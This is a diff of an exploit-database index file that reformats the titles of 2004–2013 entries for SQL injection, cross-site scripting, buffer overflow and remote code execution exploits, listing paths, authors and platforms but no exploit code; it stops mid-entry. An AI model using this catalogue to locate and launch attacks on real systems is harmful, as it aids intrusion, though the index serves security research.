24467,platforms/windows/remote/24467.rb,"ActFax 5.01 - RAW Server Exploit (Metasploit)",2013-02-07,"Craig Freyman",windows,remote,0 24468,platforms/windows/dos/24468.pl,"KMPlayer - Denial of Service",2013-02-10,Jigsaw,windows,dos,0 -24510,platforms/php/webapps/24510.txt,"Scripts Genie Domain Trader (catalog.php id param) - SQL Injection",2013-02-17,3spi0n,php,webapps,0 +24510,platforms/php/webapps/24510.txt,"Scripts Genie Domain Trader - (catalog.php id param) SQL Injection",2013-02-17,3spi0n,php,webapps,0 24511,platforms/windows/dos/24511.txt,"SAP Netweaver Message Server - Multiple Vulnerabilities",2013-02-17,"Core Security",windows,dos,0 24472,platforms/php/webapps/24472.txt,"Easy Live Shop System SQL Injection",2013-02-10,"Ramdan Yantu",php,webapps,0 24503,platforms/hardware/webapps/24503.txt,"Edimax EW-7206-APg and EW-7209APg - Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps,0 @@ -21666,7 +21666,7 @@ id,file,description,date,author,platform,type,port 24486,platforms/multiple/dos/24486.txt,"Google Chrome Silent HTTP Authentication",2013-02-11,T355,multiple,dos,0 24487,platforms/linux/dos/24487.py,"cURL Buffer Overflow",2013-02-11,Volema,linux,dos,0 24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 - (install.php) Remote Arbitrary File Read/Delete",2013-02-19,LiquidWorm,php,webapps,0 -24509,platforms/php/webapps/24509.txt,"Scripts Genie Games Site Script (index.php id param) - SQL Injection",2013-02-17,3spi0n,php,webapps,0 +24509,platforms/php/webapps/24509.txt,"Scripts Genie Games Site Script - (index.php id param) SQL Injection",2013-02-17,3spi0n,php,webapps,0 24490,platforms/windows/remote/24490.rb,"Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution",2013-02-12,Metasploit,windows,remote,0 24494,platforms/hardware/remote/24494.rb,"Polycom HDX - Telnet Authorization Bypass (Metasploit)",2013-02-14,"Paul Haas",hardware,remote,23 24492,platforms/php/webapps/24492.php,"OpenEMR 4.1.1 - (ofc_upload_image.php) Arbitrary File Upload",2013-02-13,LiquidWorm,php,webapps,0 @@ -21682,11 +21682,11 @@ id,file,description,date,author,platform,type,port 24505,platforms/windows/local/24505.py,"Photodex ProShow Producer 5.0.3297 - (.pxs) Memory Corruption Exploit",2013-02-15,"Julien Ahrens",windows,local,0 24506,platforms/php/webapps/24506.txt,"Cometchat - Multiple Vulnerabilities",2013-02-15,B127Y,php,webapps,0 24507,platforms/php/webapps/24507.txt,"chillyCMS 1.3.0 - Multiple Vulnerabilities",2013-02-15,"Abhi M Balakrishnan",php,webapps,0 -24512,platforms/php/webapps/24512.txt,"Scripts Genie Top Sites (out.php id param) - SQL Injection",2013-02-17,3spi0n,php,webapps,0 +24512,platforms/php/webapps/24512.txt,"Scripts Genie Top Sites - (out.php id param) SQL Injection",2013-02-17,3spi0n,php,webapps,0 24513,platforms/hardware/webapps/24513.txt,"Netgear DGN2200B - Multiple Vulnerabilities",2013-02-18,m-1-k-3,hardware,webapps,0 24514,platforms/php/webapps/24514.txt,"Scripts Genie Pet Rate Pro - Multiple Vulnerabilities",2013-02-18,TheMirkin,php,webapps,0 24515,platforms/php/webapps/24515.txt,"Cometchat Application - Multiple Vulnerabilities",2013-02-18,z3r0sPlOiT,php,webapps,0 -24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone (showcategory.php cid param) - SQL Injection",2013-02-18,"Easy Laster",php,webapps,0 +24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone - (showcategory.php cid param) SQL Injection",2013-02-18,"Easy Laster",php,webapps,0 24517,platforms/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,hardware,webapps,0 24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0 24531,platforms/php/webapps/24531.txt,"Web Cookbook - Multiple Vulnerabilities",2013-02-21,"cr4wl3r ",php,webapps,0 @@ -21700,12 +21700,12 @@ id,file,description,date,author,platform,type,port 24534,platforms/windows/webapps/24534.txt,"Alt-N MDaemon 13.0.3 / 12.5.6 - Email Body HTML/JS Injection",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0 24535,platforms/windows/webapps/24535.txt,"Alt-N MDaemon WorldClient 13.0.3 - Multiple Vulnerabilities",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0 24536,platforms/php/webapps/24536.txt,"glFusion 1.2.2 - Multiple XSS Vulnerabilities",2013-02-21,"High-Tech Bridge SA",php,webapps,0 -24537,platforms/php/webapps/24537.txt,"phpMyRecipes 1.2.2 (viewrecipe.php r_id param) - SQL Injection",2013-02-21,"cr4wl3r ",php,webapps,0 +24537,platforms/php/webapps/24537.txt,"phpMyRecipes 1.2.2 - (viewrecipe.php r_id param) SQL Injection",2013-02-21,"cr4wl3r ",php,webapps,0 24539,platforms/multiple/remote/24539.rb,"Java Applet JMX - Remote Code Execution (2)",2013-02-25,Metasploit,multiple,remote,0 24540,platforms/php/webapps/24540.pl,"Brewthology 0.1 - SQL Injection Exploit",2013-02-26,"cr4wl3r ",php,webapps,0 24542,platforms/php/webapps/24542.txt,"Rix4Web Portal - Blind SQL Injection",2013-02-26,L0n3ly-H34rT,php,webapps,0 24543,platforms/ios/webapps/24543.txt,"iOS IPMap 2.5 - Arbitrary File Upload",2013-02-26,Vulnerability-Lab,ios,webapps,0 -24544,platforms/php/webapps/24544.txt,"MTP Image Gallery 1.0 (edit_photos.php title param) - XSS",2013-02-26,LiquidWorm,php,webapps,0 +24544,platforms/php/webapps/24544.txt,"MTP Image Gallery 1.0 - (edit_photos.php title param) XSS",2013-02-26,LiquidWorm,php,webapps,0 24545,platforms/php/webapps/24545.txt,"MTP Guestbook 1.0 - Multiple XSS Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0 24546,platforms/php/webapps/24546.txt,"MTP Poll 1.0 - Multiple XSS Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0 24547,platforms/php/remote/24547.rb,"Kordil EDms 2.2.60rc3 - Unauthenticated Arbitrary File Upload",2013-02-26,Metasploit,php,remote,0 @@ -21727,7 +21727,7 @@ id,file,description,date,author,platform,type,port 24567,platforms/multiple/remote/24567.txt,"Oracle Database Server 8.1.7/9.0.x - ctxsys.driload Access Validation",2004-09-03,"Alexander Kornbrust",multiple,remote,0 24568,platforms/windows/remote/24568.html,"Grokster 1.3/2.6_KaZaA Media Desktop 1.3.x/1.6.1/2.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,windows,remote,0 24569,platforms/linux/dos/24569.txt,"QNX PPPoEd 2.4/4.25/6.2 - Multiple Local Buffer Overrun Vulnerabilities",2004-09-03,"Julio Cesar Fort",linux,dos,0 -24570,platforms/linux/local/24570.txt,"QNX PPPoEd 2.4/4.25/6.2 Path Environment Variable Local Command Execution",2004-09-03,"Julio Cesar Fort",linux,local,0 +24570,platforms/linux/local/24570.txt,"QNX PPPoEd 2.4/4.25/6.2 - Path Environment Variable Local Command Execution",2004-09-03,"Julio Cesar Fort",linux,local,0 24571,platforms/windows/remote/24571.html,"Nullsoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,windows,remote,0 24572,platforms/windows/remote/24572.pl,"Ipswitch WhatsUp Gold 7.0/8.0 Notification Instance Name Remote Buffer Overflow",2004-09-03,anonymous,windows,remote,0 24573,platforms/multiple/webapps/24573.txt,"Keene Digital Media Server 1.0.2 - Cross-Site Scripting",2004-09-04,dr_insane,multiple,webapps,0 @@ -21770,9 +21770,9 @@ id,file,description,date,author,platform,type,port 24606,platforms/linux/local/24606.c,"Sudo 1.6.8 - Information Disclosure",2004-09-18,"Rosiello Security",linux,local,0 24607,platforms/windows/remote/24607.txt,"Google Toolbar 1.1.x - About.HTML HTML Injection",2004-09-17,ViperSV,windows,remote,0 24608,platforms/osx/local/24608.txt,"MacOSXLabs RsyncX 2.1 - Local Privilege Escalation",2004-09-17,"Matt Johnston",osx,local,0 -24609,platforms/osx/local/24609.txt,"MacOSXLabs RsyncX 2.1 Insecure Temporary File Creation",2004-09-17,"Matt Johnston",osx,local,0 +24609,platforms/osx/local/24609.txt,"MacOSXLabs RsyncX 2.1 - Insecure Temporary File Creation",2004-09-17,"Matt Johnston",osx,local,0 24610,platforms/multiple/dos/24610.txt,"DNS4Me 3.0 - Denial of Service / Cross-Site Scripting",2004-09-17,"James Bercegay",multiple,dos,0 -24611,platforms/cgi/webapps/24611.txt,"YaBB 1.x/9.1.2000 Administrator Command Execution",2004-09-17,"GulfTech Security",cgi,webapps,0 +24611,platforms/cgi/webapps/24611.txt,"YaBB 1.x/9.1.2000 - Administrator Command Execution",2004-09-17,"GulfTech Security",cgi,webapps,0 24612,platforms/cgi/webapps/24612.txt,"YaBB 1.x/9.1.2000 YaBB.pl IMSend Cross-Site Scripting",2004-09-17,"GulfTech Security",cgi,webapps,0 24613,platforms/php/webapps/24613.txt,"ReMOSitory SQL Injection",2004-09-18,khoaimi,php,webapps,0 24614,platforms/php/webapps/24614.txt,"Mambo Open Source 4.5.1 (1.0.9) - XSS",2004-09-20,"Joxean Koret",php,webapps,0 @@ -21848,7 +21848,7 @@ id,file,description,date,author,platform,type,port 24689,platforms/php/webapps/24689.sh,"cPanel 9.9.1 -R3 Front Page Extension - Installation Information Disclosure",2004-10-18,"Karol Wiesek",php,webapps,0 24690,platforms/unix/webapps/24690.txt,"IBM Lotus Domino 6.x - Cross-Site Scripting / HTML Injection",2004-10-18,"Juan C Calderon",unix,webapps,0 24691,platforms/multiple/dos/24691.txt,"Vypress Tonecast 1.3 - Remote Denial of Service",2004-10-19,"Luigi Auriemma",multiple,dos,0 -24692,platforms/php/webapps/24692.txt,"Jan Erdmann Jebuch 1.0 HTML Injection",2004-10-19,PuWu,php,webapps,0 +24692,platforms/php/webapps/24692.txt,"Jan Erdmann Jebuch 1.0 - HTML Injection",2004-10-19,PuWu,php,webapps,0 24693,platforms/windows/remote/24693.txt,"Microsoft Internet Explorer 5.x - Valid File Drag and Drop Embedded Code",2004-10-20,http-equiv,windows,remote,0 24694,platforms/linux/local/24694.c,"Apache 1.3.x mod_include - Local Buffer Overflow",2004-10-18,xCrZx,linux,local,0 24977,platforms/linux/remote/24977.txt,"CUPS 1.1.x - HPGL File Processor Buffer Overflow",2004-12-15,"Ariel Berkman",linux,remote,0 @@ -21867,19 +21867,19 @@ id,file,description,date,author,platform,type,port 24707,platforms/multiple/remote/24707.txt,"Google Desktop Search - Cross-Site Scripting",2004-10-26,"Salvatore Aranzulla",multiple,remote,0 24708,platforms/windows/dos/24708.txt,"Quicksilver Master of Orion III 1.2.5 - Multiple Remote Denial of Service Vulnerabilities",2004-10-27,"Luigi Auriemma",windows,dos,0 24889,platforms/php/webapps/24889.txt,"WordPress Mathjax Latex Plugin 1.1 - CSRF",2013-03-26,"Junaid Hussain",php,webapps,0 -24890,platforms/windows/remote/24890.rb,"ActFax 5.01 RAW Server Buffer Overflow",2013-03-26,Metasploit,windows,remote,0 +24890,platforms/windows/remote/24890.rb,"ActFax 5.01 - RAW Server Buffer Overflow",2013-03-26,Metasploit,windows,remote,0 24710,platforms/multiple/dos/24710.txt,"id software quake ii server 3.2 - Multiple Vulnerabilities",2004-10-27,"Richard Stanway",multiple,dos,0 24711,platforms/php/remote/24711.php,"PHP 4.x/5 cURL Open_Basedir Restriction Bypass",2004-10-28,FraMe,php,remote,0 24712,platforms/windows/remote/24712.txt,"Microsoft Internet Explorer 6.0 TABLE Status Bar URI Obfuscation Weakness",2004-10-28,"Benjamin Tobias Franz",windows,remote,0 24713,platforms/multiple/remote/24713.txt,"Global Spy Software Cyber Web Filter 2 IP Filter Bypass",2004-10-29,anonymous,multiple,remote,0 -24714,platforms/windows/remote/24714.txt,"Microsoft Internet Explorer 6.0 HTML Form Tags URI Obfuscation Weakness",2004-10-30,http-equiv,windows,remote,0 +24714,platforms/windows/remote/24714.txt,"Microsoft Internet Explorer 6.0 - HTML Form Tags URI Obfuscation Weakness",2004-10-30,http-equiv,windows,remote,0 24715,platforms/multiple/dos/24715.txt,"Caudium 1.x - Remote Denial of Service",2004-10-30,"David Gourdelier",multiple,dos,0 24716,platforms/osx/remote/24716.txt,"Apple Safari 1.2 Web Browser TABLE Status Bar URI Obfuscation Weakness",2004-11-01,"Gilbert Verdian",osx,remote,0 24717,platforms/asp/webapps/24717.txt,"WebHost Automation Helm Control Panel 3.1.x - Multiple Input Validation Vulnerabilities",2004-11-02,"Behrang Fouladi",asp,webapps,0 24718,platforms/php/webapps/24718.txt,"Goolery 0.3 viewpic.php conversation_id Parameter XSS",2004-11-02,Lostmon,php,webapps,0 24719,platforms/php/webapps/24719.txt,"Goolery 0.3 viewalbum.php page Parameter XSS",2004-11-02,Lostmon,php,webapps,0 24921,platforms/php/webapps/24921.txt,"OpenCart - Change User Password CSRF",2013-04-08,"Saadi Siddiqui",php,webapps,0 -24722,platforms/cgi/webapps/24722.txt,"TIPS MailPost 5.1.1 Error Message Cross-Site Scripting",2004-11-03,Procheckup,cgi,webapps,0 +24722,platforms/cgi/webapps/24722.txt,"TIPS MailPost 5.1.1 - Error Message Cross-Site Scripting",2004-11-03,Procheckup,cgi,webapps,0 24723,platforms/cgi/webapps/24723.txt,"TIPS MailPost 5.1.1 - Remote File Enumeration",2004-11-03,"Gemma Hughes",cgi,webapps,0 24724,platforms/multiple/remote/24724.c,"Monolith Lithtech Game Engine Multiple Remote Format String Vulnerabilities",2004-11-05,"Luigi Auriemma",multiple,remote,0 24725,platforms/multiple/remote/24725.php,"Trend Micro ScanMail for Domino 2.51/2.6 - Remote File Disclosure",2004-11-05,DokFLeed,multiple,remote,0 @@ -21893,7 +21893,7 @@ id,file,description,date,author,platform,type,port 24733,platforms/windows/dos/24733.pl,"SecureAction Research Secure Network Messenger 1.4.x - Remote Denial of Service",2004-11-12,"Luigi Auriemma",windows,dos,0 24734,platforms/php/webapps/24734.txt,"chacmool Private Message System 1.1.3 - send.php tid Parameter XSS",2004-11-12,"digital ex",php,webapps,0 24735,platforms/php/webapps/24735.txt,"chacmool Private Message System 1.1.3 - send.php Arbitrary Message Access",2004-11-12,"digital ex",php,webapps,0 -24736,platforms/php/webapps/24736.txt,"PHPWebSite 0.7.3/0.8.x/0.9.3 User Module HTTP Response Splitting",2004-11-04,"Maestro De-Seguridad",php,webapps,0 +24736,platforms/php/webapps/24736.txt,"PHPWebSite 0.7.3/0.8.x/0.9.3 - User Module HTTP Response Splitting",2004-11-04,"Maestro De-Seguridad",php,webapps,0 24737,platforms/php/webapps/24737.txt,"Mark Zuckerberg Thefacebook Multiple Cross-Site Scripting Vulnerabilities",2004-11-13,"Alex Lanstein",php,webapps,0 24738,platforms/windows/dos/24738.c,"AlShare Software NetNote Server 2.2 - Remote Denial of Service",2004-11-13,class101,windows,dos,0 24739,platforms/php/webapps/24739.txt,"PowerPortal 1.3 - SQL Injection",2004-11-14,ruggine,php,webapps,0 @@ -21954,7 +21954,7 @@ id,file,description,date,author,platform,type,port 24795,platforms/linux/remote/24795.txt,"RSSH 2.x - Remote Arbitrary Command Execution",2004-12-02,"Jason Wies",linux,remote,0 24796,platforms/php/webapps/24796.txt,"Blog Torrent 0.8 - Remote Directory Traversal",2004-12-02,"Steve Kemp",php,webapps,0 24797,platforms/php/webapps/24797.txt,"Advanced Guestbook 2.2/2.3 - Cross-Site Scripting",2004-12-02,"Emile van Elen",php,webapps,0 -24798,platforms/php/webapps/24798.txt,"PAFileDB 3.1 Error Message Path Disclosure",2004-12-04,y3dips,php,webapps,0 +24798,platforms/php/webapps/24798.txt,"PAFileDB 3.1 - Error Message Path Disclosure",2004-12-04,y3dips,php,webapps,0 24799,platforms/multiple/dos/24799.txt,"Mozilla0.x_Netscape 3/4_Firefox 1.0 JavaScript IFRAME Rendering Denial Of Servic",2004-12-06,"Niek van der Maas",multiple,dos,0 24800,platforms/windows/remote/24800.txt,"Microsoft Internet Explorer 5.0.1 FTP URI Arbitrary FTP Server Command Execution",2004-12-06,"Albert Puigsech Galicia",windows,remote,0 24801,platforms/linux/remote/24801.txt,"KDE FTP KIOSlave URI Arbitrary FTP Server Command Execution",2004-12-06,"Albert Puigsech Galicia",linux,remote,0 @@ -21996,7 +21996,7 @@ id,file,description,date,author,platform,type,port 24838,platforms/asp/webapps/24838.txt,"Active Server Corner ASP Calendar 1.0 - Administrative Access",2004-12-14,"ali reza AcTiOnSpIdEr",asp,webapps,0 24839,platforms/hardware/dos/24839.c,"Ricoh Aficio 450/455 PCL Printer Remote ICMP Denial of Service",2004-12-14,"Hongzhen Zhou",hardware,dos,0 24840,platforms/asp/webapps/24840.txt,"ASP-Rider SQL Injection",2004-12-14,"Shervin Khaleghjou",asp,webapps,0 -24841,platforms/windows/dos/24841.txt,"Adobe Acrobat/Acrobat Reader 6.0 ETD File Parser Format String",2004-12-14,"Greg MacManus",windows,dos,0 +24841,platforms/windows/dos/24841.txt,"Adobe Acrobat/Acrobat Reader 6.0 - ETD File Parser Format String",2004-12-14,"Greg MacManus",windows,dos,0 24842,platforms/php/webapps/24842.txt,"IWebNegar Multiple SQL Injection",2004-12-15,"Shervin Khaleghjou",php,webapps,0 24843,platforms/osx/dos/24843.txt,"Apple Safari Web Browser 1.x - HTML Form Status Bar Misrepresentation",2004-12-15,Guillaume,osx,dos,0 24844,platforms/php/webapps/24844.txt,"phpGroupWare 0.9.x - index.php Multiple Parameter XSS",2004-12-15,"James Bercegay",php,webapps,0 @@ -22011,9 +22011,9 @@ id,file,description,date,author,platform,type,port 24856,platforms/linux/remote/24856.c,"NapShare 1.2 - Remote Buffer Overflow (1)",2004-12-06,"Bartlomiej Sieka",linux,remote,0 24857,platforms/linux/remote/24857.c,"NapShare 1.2 - Remote Buffer Overflow (2)",2004-12-10,"Bartlomiej Sieka",linux,remote,0 24858,platforms/php/webapps/24858.html,"WordPress Occasions Plugin 1.0.4 - CSRF",2013-03-19,m3tamantra,php,webapps,0 -24859,platforms/php/webapps/24859.rb,"WordPress Count per Day Plugin 3.2.5 (counter.php) - XSS",2013-03-19,m3tamantra,php,webapps,0 +24859,platforms/php/webapps/24859.rb,"WordPress Count per Day Plugin 3.2.5 - (counter.php) XSS",2013-03-19,m3tamantra,php,webapps,0 24860,platforms/hardware/webapps/24860.txt,"Verizon Fios Router MI424WR-GEN3I - CSRF",2013-03-19,"Jacob Holcomb",hardware,webapps,0 -24861,platforms/php/webapps/24861.txt,"Rebus:list (list.php list_id param) - SQL Injection",2013-03-19,"Robert Cooper",php,webapps,0 +24861,platforms/php/webapps/24861.txt,"Rebus:list - (list.php list_id param) SQL Injection",2013-03-19,"Robert Cooper",php,webapps,0 24862,platforms/php/webapps/24862.txt,"ViewGit 0.0.6 - Multiple XSS Vulnerabilities",2013-03-19,"Matthew R. Bucci",php,webapps,0 24863,platforms/windows/local/24863.html,"EastFTP 4.6.02 - ActiveX Control (0Day)",2013-03-20,Dr_IDE,windows,local,0 24864,platforms/hardware/webapps/24864.pl,"StarVedia IPCamera IC502w IC502w+ v020313 - Username/Password Disclosure",2013-03-22,"Todor Donev",hardware,webapps,0 @@ -22022,17 +22022,17 @@ id,file,description,date,author,platform,type,port 24867,platforms/php/webapps/24867.html,"WordPress IndiaNIC FAQs Manager Plugin 1.0 - Multiple Vulnerabilities",2013-03-22,m3tamantra,php,webapps,0 24868,platforms/php/webapps/24868.rb,"WordPress IndiaNIC FAQs Manager Plugin 1.0 - Blind SQL Injection",2013-03-22,m3tamantra,php,webapps,0 24869,platforms/php/webapps/24869.txt,"AContent 1.3 - Local File Inclusion",2013-03-22,DaOne,php,webapps,0 -24870,platforms/php/webapps/24870.txt,"Flatnux CMS 2013-01.17 (index.php theme param) - Local File Inclusion",2013-03-22,DaOne,php,webapps,0 +24870,platforms/php/webapps/24870.txt,"Flatnux CMS 2013-01.17 - (index.php theme param) Local File Inclusion",2013-03-22,DaOne,php,webapps,0 24871,platforms/php/webapps/24871.txt,"Slash CMS - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0 24872,platforms/windows/local/24872.txt,"Photodex ProShow Gold/Producer 5.0.3310 & 6.0.3410 - ScsiAccess Local Privilege Escalation",2013-03-22,"Julien Ahrens",windows,local,0 24873,platforms/php/webapps/24873.txt,"Stradus CMS 1.0beta4 - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0 24874,platforms/multiple/remote/24874.rb,"Apache Struts ParametersInterceptor Remote Code Execution",2013-03-22,Metasploit,multiple,remote,0 24875,platforms/windows/remote/24875.rb,"Sami FTP Server LIST Command Buffer Overflow",2013-03-22,Metasploit,windows,remote,0 24876,platforms/windows/remote/24876.rb,"Cool PDF Image Stream - Buffer Overflow",2013-03-22,Metasploit,windows,remote,0 -24877,platforms/php/webapps/24877.txt,"OpenCart 1.5.5.1 (filemanager.php) - Directory Traversal Arbitrary File Access",2013-03-22,waraxe,php,webapps,0 +24877,platforms/php/webapps/24877.txt,"OpenCart 1.5.5.1 - (filemanager.php) Directory Traversal Arbitrary File Access",2013-03-22,waraxe,php,webapps,0 24879,platforms/php/webapps/24879.txt,"Free Hosting Manager 2.0.2 - Multiple SQLi",2013-03-25,"Saadi Siddiqui",php,webapps,0 24880,platforms/windows/dos/24880.pl,"IconCool MP3 WAV Converter 3.00 Build 120518 - Stack Buffer Overflow",2013-03-25,G0li47h,windows,dos,0 -24881,platforms/php/webapps/24881.txt,"ClipShare 4.1.1 (gmembers.php gid param) - Blind SQL Injection",2013-03-25,Esac,php,webapps,0 +24881,platforms/php/webapps/24881.txt,"ClipShare 4.1.1 - (gmembers.php gid param) Blind SQL Injection",2013-03-25,Esac,php,webapps,0 24882,platforms/php/webapps/24882.pl,"vBulletin 5.0.0 Beta 11 < 5.0.0 Beta 28 - SQL Injection",2013-03-25,"Orestis Kourides",php,webapps,0 24883,platforms/php/webapps/24883.rb,"Ra1NX PHP Bot - pubcall Authentication Bypass Remote Code Execution (Metasploit)",2013-03-25,bwall,php,webapps,0 24884,platforms/windows/local/24884.html,"LiquidXML Studio 2012 - ActiveX Insecure Method Executable File Creation (0Day)",2013-03-25,Dr_IDE,windows,local,0 @@ -22042,11 +22042,11 @@ id,file,description,date,author,platform,type,port 24888,platforms/linux/remote/24888.rb,"Mutiny Remote Command Execution",2013-03-25,Metasploit,linux,remote,0 24891,platforms/windows/remote/24891.rb,"HP Intelligent Management Center Arbitrary File Upload",2013-03-26,Metasploit,windows,remote,0 24892,platforms/hardware/remote/24892.txt,"Rosewill RSVA11001 - Remote Command Injection",2013-03-26,"Eric Urban",hardware,remote,0 -24893,platforms/php/webapps/24893.txt,"PsychoStats 3.2.2b (awards.php id param) - Blind SQL Injection",2013-03-27,"Mohamed from ALG",php,webapps,0 +24893,platforms/php/webapps/24893.txt,"PsychoStats 3.2.2b - (awards.php id param) Blind SQL Injection",2013-03-27,"Mohamed from ALG",php,webapps,0 24894,platforms/php/webapps/24894.txt,"ClipShare 4.1.1 - Multiples Vulnerabilites",2013-03-27,Esac,php,webapps,0 24896,platforms/hardware/dos/24896.sh,"Konftel 300IP SIP-based Conference Phone 2.1.2 - Remote Bypass Reboot",2013-03-29,"Todor Donev",hardware,dos,0 24897,platforms/windows/remote/24897.rb,"KNet Web Server 1.04b - Buffer Overflow SEH",2013-03-29,"Myo Soe",windows,remote,0 -24898,platforms/php/webapps/24898.txt,"SynConnect Pms (index.php loginid param) - SQL Injection",2013-03-29,"Bhadresh Patel",php,webapps,0 +24898,platforms/php/webapps/24898.txt,"SynConnect Pms - (index.php loginid param) SQL Injection",2013-03-29,"Bhadresh Patel",php,webapps,0 24899,platforms/hardware/local/24899.txt,"Draytek Vigor 3900 1.06 - Privilege Escalation",2013-03-29,"Mohammad abou hayt",hardware,local,0 24943,platforms/windows/remote/24943.py,"BigAnt Server 2.97 - DDNF Username Buffer Overflow",2013-04-10,"Craig Freyman",windows,remote,0 24955,platforms/linux/remote/24955.rb,"Nagios Remote Plugin Executor Arbitrary Command Execution",2013-04-12,Metasploit,linux,remote,5666 @@ -22058,10 +22058,10 @@ id,file,description,date,author,platform,type,port 24905,platforms/multiple/remote/24905.rb,"v0pCr3w Web Shell - Remote Code Execution",2013-03-29,Metasploit,multiple,remote,0 24906,platforms/php/webapps/24906.txt,"AWS Xms 2.5 - (importer.php what param) Directory Traversal",2013-03-29,"High-Tech Bridge SA",php,webapps,0 24907,platforms/windows/remote/24907.txt,"McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method",2013-03-29,"High-Tech Bridge SA",windows,remote,0 -24918,platforms/windows/dos/24918.py,"Personal File Share 1.0 DoS",2013-04-05,npn,windows,dos,0 +24918,platforms/windows/dos/24918.py,"Personal File Share 1.0 - DoS",2013-04-05,npn,windows,dos,0 24910,platforms/windows/local/24910.txt,"VirtualDJ Pro/Home 7.3 - Buffer Overflow",2013-04-02,"Alexandro Sánchez Bach",windows,local,0 -24911,platforms/php/webapps/24911.txt,"Pollen CMS 0.6 (index.php p param) - Local File Disclosure",2013-04-02,MizoZ,php,webapps,0 -24913,platforms/php/webapps/24913.txt,"Network Weathermap 0.97a (editor.php) - Persistent XSS",2013-04-02,"Daniel Ricardo dos Santos",php,webapps,0 +24911,platforms/php/webapps/24911.txt,"Pollen CMS 0.6 - (index.php p param) Local File Disclosure",2013-04-02,MizoZ,php,webapps,0 +24913,platforms/php/webapps/24913.txt,"Network Weathermap 0.97a - (editor.php) Persistent XSS",2013-04-02,"Daniel Ricardo dos Santos",php,webapps,0 24914,platforms/php/webapps/24914.txt,"WordPress FuneralPress Plugin 1.1.6 - Persistent XSS",2013-04-02,"Rob Armstrong",php,webapps,0 24915,platforms/multiple/webapps/24915.txt,"Aspen 0.8 - Directory Traversal",2013-04-02,"Daniel Ricardo dos Santos",multiple,webapps,0 24916,platforms/hardware/webapps/24916.txt,"Netgear WNR1000 - Authentication Bypass",2013-04-02,"Roberto Paleari",hardware,webapps,0 @@ -22077,7 +22077,7 @@ id,file,description,date,author,platform,type,port 24931,platforms/hardware/remote/24931.rb,"Netgear DGN1000B setup.cgi Remote Command Execution",2013-04-08,Metasploit,hardware,remote,0 24932,platforms/linux/webapps/24932.txt,"Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities",2013-04-08,"SEC Consult",linux,webapps,0 24933,platforms/linux/local/24933.txt,"PonyOS 0.4.99-mlp - Multiple Vulnerabilities",2013-04-08,"John Cartwright",linux,local,0 -24934,platforms/php/webapps/24934.txt,"WHMCS Group Pay Plugin 1.5 (grouppay.php hash param) - SQL Injection",2013-04-08,"HJauditing Employee Tim",php,webapps,0 +24934,platforms/php/webapps/24934.txt,"WHMCS Group Pay Plugin 1.5 - (grouppay.php hash param) SQL Injection",2013-04-08,"HJauditing Employee Tim",php,webapps,0 24935,platforms/linux/remote/24935.rb,"MongoDB nativeHelper.apply Remote Code Execution",2013-04-08,Metasploit,linux,remote,0 24936,platforms/hardware/remote/24936.rb,"Linksys E1500/E2500 apply.cgi Remote Command Injection",2013-04-08,Metasploit,hardware,remote,0 24937,platforms/linux/remote/24937.rb,"HP System Management Anonymous Access Code Execution",2013-04-08,Metasploit,linux,remote,0 @@ -22127,9 +22127,9 @@ id,file,description,date,author,platform,type,port 24980,platforms/multiple/remote/24980.txt,"Yanf 0.4 HTTP Response Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote,0 24981,platforms/multiple/remote/24981.txt,"JPegToAvi 1.5 - File List Buffer Overflow",2004-12-15,"James Longstreet",multiple,remote,0 24982,platforms/multiple/remote/24982.txt,"Bolthole Filter 2.6.1 Address Parsing Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote,0 -24983,platforms/multiple/remote/24983.txt,"Vilistextum 2.6.6 HTML Attribute Parsing Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote,0 +24983,platforms/multiple/remote/24983.txt,"Vilistextum 2.6.6 - HTML Attribute Parsing Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote,0 24984,platforms/multiple/remote/24984.txt,"2Fax 3.0 Tab Expansion - Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote,0 -24985,platforms/php/remote/24985.txt,"PHP 4/5 addslashes() NULL Byte Bypass",2004-12-16,"Daniel Fabian",php,remote,0 +24985,platforms/php/remote/24985.txt,"PHP 4/5 - addslashes() NULL Byte Bypass",2004-12-16,"Daniel Fabian",php,remote,0 24986,platforms/cgi/webapps/24986.txt,"Ikonboard 3.x - Multiple SQL Injection",2004-12-16,anonymous,cgi,webapps,0 24987,platforms/php/webapps/24987.txt,"JSBoard 2.0.x - Remote Arbitrary Script Upload",2004-12-16,"Jeremy Bae",php,webapps,0 24988,platforms/php/webapps/24988.txt,"WordPress 1.2.1/1.2.2 - /wp-admin/post.php content Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 @@ -22142,7 +22142,7 @@ id,file,description,date,author,platform,type,port 24995,platforms/multiple/remote/24995.txt,"DXFScope 0.2 - Remote Client-Side Buffer Overflow",2004-12-16,"Ariel Berkman",multiple,remote,0 24996,platforms/windows/remote/24996.rb,"SAP ConfigServlet Remote Unauthenticated Payload Execution (Metasploit)",2013-04-25,"Andras Kabai",windows,remote,0 25184,platforms/php/webapps/25184.txt,"ProjectBB 0.4.5.1 - Multiple SQL Injection",2005-03-02,"benji lemien",php,webapps,0 -25185,platforms/php/webapps/25185.txt,"D-Forum 1.11 Nav.php3 - Cross-Site Scripting",2005-03-03,benjilenoob,php,webapps,0 +25185,platforms/php/webapps/25185.txt,"D-Forum 1.11 - Nav.php3 